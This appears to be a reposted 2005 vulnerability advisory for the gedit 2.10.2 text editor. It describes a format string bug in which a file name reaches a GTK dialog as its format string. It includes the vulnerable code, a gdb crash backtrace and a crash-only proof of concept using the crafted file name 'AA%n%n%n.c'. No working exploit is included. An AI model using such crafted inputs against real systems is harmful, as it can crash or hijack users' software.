• 当前位置:首页>>编程开发A>>安全防御>>pst.advisory: gedit fun. opensource is god .lol windows
  • pst.advisory: gedit fun. opensource is god .lol windows
  • 创建时间:2005-05-20
    文章属性:原创
    文章提交:jsk__ (jsk_at_ph4nt0m.org)

    Systems affected:

    gedit 2.10.2


    no affected

    all exploitable  

    1:why:  gedit is power tool .. it used to edit *.c *.pl *.py ............

    when it open a bin  .. ths bin's name or filename is format strings ... it is exploitable


    2:tips:


    void
    gedit_utils_error_reporting_loading_file (
            const gchar *uri,
            const GeditEncoding *encoding,
            GError *error,
            GtkWindow *parent)
    {
    ............


        if (error_message == NULL)
        {
            if ((error == NULL) || (error->message == NULL))
                error_message = g_strdup_printf (
                                        _("Could not open the file \"%s\"."),
                             uri_for_display);................name
            else
                error_message = g_strdup_printf (
                                        _("Could not open the file \"%s\".\n\n%s."),
                             uri_for_display, error->message);..........name

        }

        g_free (encoding_name);

        dialog = gtk_message_dialog_new (
                parent,
                GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT,
                   GTK_MESSAGE_ERROR,
                   GTK_BUTTONS_OK,
                error_message);....................boom......
      

    3: more show

    Program received signal SIGSEGV, Segmentation fault.
    0x40f9b740 in gtk_window_set_transient_for () from /usr/lib/libgtk-x11-2.0.so.0
    (gdb) bt
    #0  0x40f9b740 in gtk_window_set_transient_for ()
       from /usr/lib/libgtk-x11-2.0.so.0
    #1  0x40ea33c9 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
    #2  0x080723a1 in gedit_utils_error_reporting_loading_file ()
    #3  0x080779f8 in gedit_file_open_from_stdin ()
    #4  0x00000000 in ?? ()
    #5  0x083f98e8 in ?? ()
    #6  0x0813f538 in ?? ()
    #7  0x080ad668 in TC_GNOME_Gedit_Application_struct ()
    #8  0x08339e30 in ?? ()
    #9  0x00000000 in ?? ()
    #10 0x41287ca1 in __default_morecore () from /lib/libc.so.6


    4: A LAME  proof-of-concept

    bash-2.05b#cat fmtexp.c

    #include <stdio.h>


    int
    main()
    {
      printf("hah gedit\n");
    }


    bash-2.05b#gcc -o fk fmtexp.c

    bash-2.05b#mv fk AA%n%n%n.c

    bash-2.05b#gedit  AA%n%n%n.c

    no working exploit will be here..:P



    CREDIT:

    jsk (www.0xbadexworm.org) discovery this vulnerability

    ths: all members from PST and doris
  • 上一篇:[AD_LAB-05001] OpenOffice DOC document Heap Overflow
    下一篇:pst.advisory : gxine remote exploitable . opensource is god .lol windows